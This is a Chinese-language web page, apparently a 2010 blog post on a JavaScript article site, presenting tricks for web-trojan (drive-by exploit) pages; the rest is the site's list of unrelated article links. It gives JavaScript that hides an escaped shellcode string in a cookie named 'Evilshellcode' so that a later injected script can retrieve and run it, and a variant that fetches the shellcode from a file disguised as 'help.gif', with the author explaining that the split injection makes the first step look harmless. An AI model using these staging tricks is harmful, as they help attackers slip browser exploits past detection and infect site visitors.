一个网马的tips实现分析


Posted in Javascript onNovember 28, 2010

cookie示例代码:

//存放 
function setCookie(sVar, sVal){ 
theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC'; 
document.cookie = theCookie;} 
shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......" 
setCookie('Evilshellcode', shellcode); 
//取出 
function getCookie(sVar){ 
cookies = document.cookie.split('; '); 
for(var i = 1; i <= cookies.length; i++){ 
if(cookies[i - 1].split('=')[0] == sVar){return cookies[i - 1].split('=')[1];}} 
return ''; 
} 
a=unescape(getCookie('Evilshellcode'))

cookie存放的话,可以挂两次,第一次挂cookie写入代码无害,第二次再取出来结合新挂的代码来运行。怎么用随你了。

ajax来调用

<script src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js" type="text/javascript"></script> 
var shellcode = $.ajax({ 
url: "help.gif", 
async: false 
}).responseText

help.gif内容

%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec

Javascript 相关文章推荐
在JS中最常看到切最容易迷惑的语法(转)
Oct 29 Javascript
javascript实现类似超链接的效果
Dec 26 Javascript
基于jQuery的ajax方法封装
Jul 14 Javascript
AngularJS 依赖注入详解和简单实例
Jul 28 Javascript
js HTML5多图片上传及预览实例解析(不含前端的文件分割)
Aug 26 Javascript
用自定义图片代替原生checkbox实现全选,删除以及提交的方法
Oct 18 Javascript
vue2滚动条加载更多数据实现代码
Jan 10 Javascript
vue之数据交互实例代码
Jun 16 Javascript
通过源码分析Vue的双向数据绑定详解
Sep 24 Javascript
Windows安装Node.js报错:2503、2502的解决方法
Oct 25 Javascript
关于vue v-for循环解决img标签的src动态绑定问题
Sep 18 Javascript
vue 列表页跳转详情页获取id以及详情页通过id获取数据
Mar 27 Javascript
JQUBAR1.1 jQuery 柱状图插件发布
Nov 28 #Javascript
为jQuery增加join方法的实现代码
Nov 28 #Javascript
Jquery拖拽并简单保存的实现代码
Nov 28 #Javascript
jquery下将选择的checkbox的id组成字符串的方法
Nov 28 #Javascript
用jquery设置按钮的disabled属性的实现代码
Nov 28 #Javascript
IE6弹出“已终止操作”的解决办法
Nov 27 #Javascript
javascript 获取所有id中包含某关键字的控件的实现代码
Nov 25 #Javascript
You might like
用 Composer构建自己的 PHP 框架之基础准备
2014/10/30 PHP
PHP开启opcache提升代码性能
2015/04/26 PHP
php实现比较两个字符串日期大小的方法
2015/05/12 PHP
PHP实现的自定义图像居中裁剪函数示例【测试可用】
2017/08/11 PHP
JavaScript 在各个浏览器中执行的耐性
2009/04/06 Javascript
JQuery SELECT单选模拟jQuery.select.js
2009/11/12 Javascript
Extjs学习笔记之一 初识Extjs之MessageBox
2010/01/07 Javascript
JS+CSS实现带关闭按钮DIV弹出窗口的方法
2015/02/27 Javascript
jQuery实现强制cookie过期方法汇总
2015/05/22 Javascript
JS实现新浪微博效果带遮罩层的弹出框代码
2015/10/12 Javascript
ligerUI---ListBox(列表框可移动的实例)
2017/11/28 Javascript
vue引入js数字小键盘的实现代码
2018/05/14 Javascript
聊聊Vue 中 title 的动态修改问题
2019/06/11 Javascript
关于layui表单中按钮自动提交的解决方法
2019/09/09 Javascript
利用JS如何获取form表单数据
2019/12/19 Javascript
python基础教程之常用运算符
2014/08/29 Python
介绍Python中的fabs()方法的使用
2015/05/14 Python
Python入门之modf()方法的使用
2015/05/15 Python
python编程之requests在网络请求中添加cookies参数方法详解
2017/10/25 Python
对python中dict和json的区别详解
2018/12/18 Python
python并发编程多进程 模拟抢票实现过程
2019/08/20 Python
python可视化实现KNN算法
2019/10/16 Python
python 无损批量压缩图片(支持保留图片信息)的示例
2020/09/22 Python
运行Python编写的程序方法实例
2020/10/21 Python
python3 使用ssh隧道连接mysql的操作
2020/12/05 Python
亚历山大·王官网:Alexander Wang
2017/06/23 全球购物
意大利比基尼品牌:MISS BIKINI
2019/11/02 全球购物
.net面试题
2016/09/17 面试题
一名老师的自我评价
2014/02/07 职场文书
《风娃娃》教学反思
2014/04/19 职场文书
协议书怎么写
2014/04/21 职场文书
《秋游》教学反思
2014/04/24 职场文书
大学生职业生涯十年规划书范文
2014/09/17 职场文书
党委干部批评与自我批评发言稿
2014/09/28 职场文书
大学感恩节活动总结
2015/05/05 职场文书
国际贸易实训总结
2015/08/03 职场文书